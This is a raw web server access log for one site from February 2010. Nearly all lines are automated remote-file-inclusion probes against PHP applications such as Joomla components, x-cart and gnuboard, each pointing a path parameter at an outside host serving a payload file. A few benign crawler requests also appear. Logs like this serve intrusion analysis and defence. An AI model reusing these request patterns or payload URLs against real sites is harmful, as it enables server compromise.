116.40.122.117 - - [07/Feb/2010:07:50:11 -0800] "GET /logs/access_100114.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:50:17 -0800] "GET /admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:50:17 -0800] "GET /logs//admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:50:17 -0800] "GET /logs/access_100118.log%20%20//admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:50:25 -0800] "GET /logs/access_100115.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:50:25 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:50:25 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:50:42 -0800] "GET /logs/access_100114.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:51:33 -0800] "GET /admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:51:33 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:51:33 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:51:45 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:51:45 -0800] "GET /logs/access_100126.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:51:45 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:51:47 -0800] "GET /logs//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:51:47 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:51:47 -0800] "GET /gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:51:47 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:51:49 -0800] "GET /logs/access_100117.log//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:52:08 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:52:08 -0800] "GET /logs/access_100117.log%20%20//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:52:56 -0800] "GET /logs/access_100109.log%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:52:57 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:52:57 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:53:02 -0800] "GET /logs/access_100113.log%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:53:27 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:53:27 -0800] "GET /admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:53:27 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:53:31 -0800] "GET /logs/access_100115.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:53:31 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:53:31 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:53:44 -0800] "GET /logs/access_100117.log//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:54:23 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:07:54:43 -0800] "GET /logs/access_100117.log%20%20//admin/auth.php?xcart_dir=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:55:02 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:55:02 -0800] "GET //delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:55:02 -0800] "GET /logs/access_100126.log%20%20///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:55:10 -0800] "GET /logs/access_100121.log%20%20///delete_comment.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:55:12 -0800] "GET /logs//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:55:12 -0800] "GET /gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:55:12 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:55:12 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:56:18 -0800] "GET /logs/access_100118.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:25 -0800] "GET /logs/access_100114.log%20%20//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:26 -0800] "GET /logs//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:26 -0800] "GET /index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:30 -0800] "GET /logs/access_100114.log%20%20//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:30 -0800] "GET /logs//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:31 -0800] "GET /index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:42 -0800] "GET /logs/access_100117.log%20%20//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:56:49 -0800] "GET /logs/access_100117.log%20%20//index.php?=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:57:06 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:57:06 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:57:06 -0800] "GET /logs/access_100126.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:57:18 -0800] "GET /logs/access_100127.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:57:34 -0800] "GET /logs/access_100113.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:07:59:05 -0800] "GET /logs/access_100109.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:07:59:06 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:07:59:06 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:59:26 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:59:26 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:59:26 -0800] "GET /logs/access_100127.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:59:26 -0800] "GET /logs/access_100127.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:59:26 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:59:26 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:59:40 -0800] "GET /logs/access_100118.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:00:23 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:00:23 -0800] "GET /logs/access_100202.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:00:23 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:08:00:50 -0800] "GET /logs/access_100127.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:01:00 -0800] "GET /logs/access_100130.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:08:01:11 -0800] "GET /logs/access_100125.log%20%20///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:08:01:13 -0800] "GET /logs/access_100113.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
219.240.36.36 - - [07/Feb/2010:08:01:56 -0800] "GET /logs/access_100108.log//delete_comment.php?board_skin_path=http://www.manpoints.net/ei/11.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [07/Feb/2010:08:01:56 -0800] "GET /delete_comment.php?board_skin_path=http://www.manpoints.net/ei/11.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [07/Feb/2010:08:01:56 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.manpoints.net/ei/11.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:08:02:14 -0800] "GET /logs/access_100118.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:03:37 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:03:37 -0800] "GET /logs/access_100113.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:03:37 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:03:37 -0800] "GET /logs/access_100130.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:08:04:20 -0800] "GET /logs/access_100118.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [07/Feb/2010:08:04:20 -0800] "GET /logs/access_100126.log//delete_comment.php?board_skin_path=http://www.manpoints.net/ei/11.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:04:31 -0800] "GET /logs/access_100109.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:04:32 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:04:33 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
216.119.103.12 - - [07/Feb/2010:08:05:41 -0800] "GET /logs/access_100111.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:08:06:36 -0800] "GET /logs/access_100113.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:08:08:34 -0800] "GET /logs/access_100108.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [07/Feb/2010:08:09:49 -0800] "GET /logs/access_100119.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://82.73.229.174//list/a1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:10:13 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:10:13 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:10:13 -0800] "GET /logs/access_100124.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:10:15 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:10:15 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:10:15 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:08:11:25 -0800] "GET /module/view.php?id=welcome HTTP/1.0" 200 4890 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:08:11:25 -0800] "GET /style/default_style.css HTTP/1.0" 200 1982 "http://www.puaga.com/module/view.php?id=welcome" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:08:11:26 -0800] "GET /themes/retro.css HTTP/1.0" 404 5258 "http://www.puaga.com/module/view.php?id=welcome" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:08:12:29 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:08:12:29 -0800] "GET //write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:08:12:29 -0800] "GET /logs///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:08:12:35 -0800] "GET /logs/access_100120.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
